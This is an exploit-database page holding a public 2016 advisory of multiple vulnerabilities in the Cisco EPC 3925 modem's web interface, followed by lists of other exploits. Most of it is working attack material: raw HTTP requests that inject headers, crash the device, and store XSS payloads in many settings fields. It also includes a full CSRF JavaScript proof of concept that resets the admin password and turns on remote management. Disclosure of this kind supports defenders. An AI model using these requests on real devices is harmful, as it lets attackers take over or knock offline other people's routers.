"Cisco EPC 3925 - Multiple Vulnerabilities"

Author

Exploit author

"Patryk Bogdan"

Platform

Exploit platform

asp

Release date

Exploit published date

2016-09-15

                
                    
                         Download file
                    
                
            
# Title: Cisco EPC 3925 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco EPC3925 (EuroDocsis 3.0 2-PORT Voice Gateway)
# Date: 15.09.2016
# Author: Patryk Bogdan 

========

Vulnerability list:
1. HTTP Response Injection via 'Lang' Cookie
2. DoS via 'Lang' Cookie
3. DoS in Wireless Client List via 'h_sortWireless'
4. (Un)authorized modem restart (Channel Selection)
5. CSRF
6. Stored XSS in SMTP Settings (Administration -> Reportning)
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)

========

1. HTTP Response Injection

It is able to inject arbitrary data into device memory via 'Lang' cookie,
additional data will be stored until modem restart and will be returned with every http response.

#1 - Request:
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Cookie: Lang=en; SessionID=171110
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
(...)


#2 - Request:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: pwned
Set-Cookie: SessionID=219380
Content-Length: 1398
(...)


2. DoS via 'Lang' Cookie

Modem crashes when cookie variable in request is too long.

#1 - Request (crash via http injection):
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

username_login=aaa&password_login=bbb&LanguageSelect=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close


#2 - Request:
GET /Docsis_system.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Set-Cookie: SessionID=163190
Content-Length: 18743
(...)

At this point modem crashes:

C:\Users\Patryk>ping -n 10 192.168.100.1

Pinging 192.168.100.1 with 32 bytes of data:
Request timed out.
Request timed out.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
(...)

DoS can be also executed with single HTTP request, like this:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/
Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
Connection: close


3. DoS in Wireless Client List via 'h_sortWireless'

Modem crashes when variable for POST parameter 'h_sortWireless' is too long.

#1 - Request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/WClientMACList.asp
Cookie: Lang=en; SessionID=71750
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/WClientMACList.asp
Content-type: text/html
Connection: close

( ... crash ... )


4. (Un)authorized channel Selection

On Cisco 3925 unauthorized user can edit device channel settings and restart the modem. Such functionality should be available only for logged users, for example it's disabled on EPC 3928.


5. CSRF

There is no prevention against CSRF attacks, attacker can for example change admin credentials and enable remote managment in single request.

PoC:
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.100.1/goform/Administration", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=admin&sysPasswd=newpass&sysConfirmPasswd=newpass&remote_management=enable&http_wanport=8080&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=enable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>



6. Stored XSS in Administration -> Reporting

#1 - Request:
POST /goform/Log HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236

email_enable=enable&smtp_server=%22+onmouseover%3Dalert%281%29+x%3D%22y&email_for_log=%22+onmouseover%3Dalert%282%29+x%3D%22y&SmtpUsername=%22+onmouseover%3Dalert%283%29+x%3D%22y&SmtpPassword=aaa&save=Save+Settings&h_email_enable=enable

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Log.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Log.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 6454
(...)
<TD>
									<input type="text" name="smtp_server" maxlength="255" size="30" value="" onmouseover=alert(1) x="y" />
								</TD>
							</TR>
							<tr>
								<TD>
									<script language="javascript" type="text/javascript">dw(va_log_email3);</script>
								</TD>
								<TD>
									<input type="text" name="email_for_log" maxlength="255" size="30" value="" onmouseover=alert(2) x="y"/>
								</TD>
							</TR>
							<tr>
								<TD>
									<script language="javascript" type="text/javascript">dw(msg_smtp_username);</script>
								</TD>
								<TD>
									<input type="text" name="SmtpUsername" maxlength="255" size="30" value="" onmouseover=alert(3) x="y" />
								</TD>
							</TR>
(...)


7. Stored XSS in User Name (Administration -> Managment / Setup -> Quick Setup)

#1 - Request:
POST /goform/Administration HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 746

connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sysPasswd=aaa&sysConfirmPasswd=aaa&remote_management=disable&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=disable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Quick_setup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 34779
(...)
<tr>
  <td nowrap>
    <script language="javascript" type="text/javascript">dw(va_local_access2);</script>
  </td>
  <td nowrap>
    <script>alert('XSS')</script>
  </td>
</tr>
(...)


8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)

#1 - Request:
POST /goform/Rg_UserSetup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

NewUser=user onmouseover=alert('XSS')&Btn_AddUser=Add+User&AddUser=1&UserList=Default&RemoveUser=0&UserConfigChanged=0

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_UserSetup.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Rg_UserSetup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9706
(...)
<select onchange="submit();" name="UserList">
											<option value=Default >1. Default<option value=user onmouseover=alert('XSS') selected>2. user onmouseover=alert('XSS
</select>
(...)


9. Stored XSS in ToD Filter

#1 - Request:
POST /goform/Rg_TodFilter HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 189

TodClient=<script>alert('XSS')</script>&TodAdd=Add&addTodClient=1&ToDComputers=No+filters+entered.&removeTodClient=&StartHour=12&StartMinute=00&StartAmPm=1&EndHour=12&EndMinute=00&EndAmPm=1

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_TodFilter.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Rg_TodFilter.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9140
(...)
<select name="ToDComputers" onChange="submit();">
										<option value=0 selected>1. <script>alert('XSS')</script>
</select>
(...)


10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)

#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 282

NewContentRule=<script>alert('XSS')</script>&AddRule=Add+Rule&AddContentRule=1&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=&AllowedDomainAction=0&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 11126
(...)
<select name="ContentRules" onChange="submit();">
										<option value=0 selected>1. Default<option value=1 >2. <script>alert('XSS')</script>
</select>
(...)


11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)

#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 318

NewContentRule=&AddContentRule=&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&AddAllowedDomain=Add+Allowed+Domain&AllowedDomainAction=1&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10741
(...)
<select name="AllowedDomainList" size=5>
											<option value="1"><script>alert('XSS')</script>
</select>
(...)


12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)

#1 - Request:
POST /goform/Quick_setup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 371

Password=&PasswordReEnter=&setup_wifi_enable=enable&ssid=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&security_mode=psk2_mixed&wpa_enc=tkip%2Baes&wpa_psk_key=231503725&radius_ip_1=0&radius_ip_2=0&radius_ip_3=0&radius_ip_4=0&keysize=64&tx_key=1&save=Save+Settings&h_setup_wifi_enable=enable&h_security_mode=psk2_mixed&h_wpa_enc=tkip%2Baes&qs_wds_setting=disable&UserId=

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Wireless.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 51653
(...)
<tr>
									<td>
										<B><script language="javascript" type="text/javascript">dw(vwnetwork_name);</script></B>
									</td>
									<td colspan="2">
										<script>alert('XSS')</script>
									</td>
								</tr>
(...)


13. Stored XSS in DDNS Settings (Setup -> DDNS)

#1 - Request:
POST /goform/Setup_DDNS HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

DdnsService=0&DdnsUserName=user" onmouseover=alert('XSS_1') x="&DdnsPassword=aaa x="&DdnsHostName=host" onmouseover=alert('XSS_2') x="y&save=Save+Settings

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Setup_DDNS.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /Setup_DDNS.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 5738
(...)
<td>
									<input name="DdnsUserName" type="text" size="16" maxlength="64" value="user" onmouseover=alert('XSS_1') x="" />
</td>
(...)
<td>
									<input name="DdnsHostName" type="text" size="32" maxlength="256" value="host" onmouseover=alert('XSS_2') x="y" />
</td>
(...)


14. Stored XSS in Adv. VPN Setup (Security -> VPN -> Advanced Settings)

#1 - Request:
POST /goform/vpn_adv HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 286

NegotiationMode=0&LocalIdentityType=2&LocalIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&RemoteIdentityType=2&RemoteIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&Phase1Encryption=2&Phase1Authentication=1&Phase1DhGroup=0&Phase1SaLifetime=28800&Phase2DhGroup=0

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/vpn_adv.asp
Content-type: text/html
Connection: close

#2 - Request:
GET /vpn_adv.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close

#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10179
(...)
<td>
													<input type="radio" name="LocalIdentityType" value="2" onClick="LocalIdentityTypeClicked();" />
													<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
													<input type="text" name="LocalIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
(...)
<tr>
												<td>
													<input type="radio" name="RemoteIdentityType" value="2" onClick="RemoteIdentityTypeClicked();">
													<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
													<input type="text" name="RemoteIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
												</td>
</tr>
(...)

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-07-10	"HelloWeb 2.0 - Arbitrary File Download"	webapps	asp	bRpsd
2020-03-16	"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"	webapps	asp	"Miguel Mendez Z"
2020-01-24	"OLK Web Store 2020 - Cross-Site Request Forgery"	webapps	asp	"Joel Aviad Ossi"
2019-12-18	"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting"	webapps	asp	"Harshit Shukla"
2019-11-18	"Crystal Live HTTP Server 6.01 - Directory Traversal"	webapps	asp	"numan türle"
2019-08-16	"Web Wiz Forums 12.01 - 'PF' SQL Injection"	webapps	asp	n1x_
2019-05-06	"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection"	webapps	asp	"felipe andrian"
2019-02-12	"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow"	dos	asp	"Kaustubh G. Padwad"
2018-11-05	"Advantech WebAccess SCADA 8.3.2 - Remote Code Execution"	webapps	asp	"Chris Lyne"
2018-05-29	"IssueTrak 7.0 - SQL Injection"	webapps	asp	"Chris Anastasio"

Release Date	Title	Type	Platform	Author
2017-04-11	"Brother MFC-J6520DW - Authentication Bypass / Password Change"	webapps	hardware	"Patryk Bogdan"
2017-04-07	"D-Link DWR-116 / DWR-116A1 - Arbitrary File Download"	webapps	hardware	"Patryk Bogdan"
2016-09-15	"Cisco EPC 3925 - Multiple Vulnerabilities"	webapps	asp	"Patryk Bogdan"
2016-06-07	"Cisco EPC 3928 - Multiple Vulnerabilities"	webapps	asp	"Patryk Bogdan"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

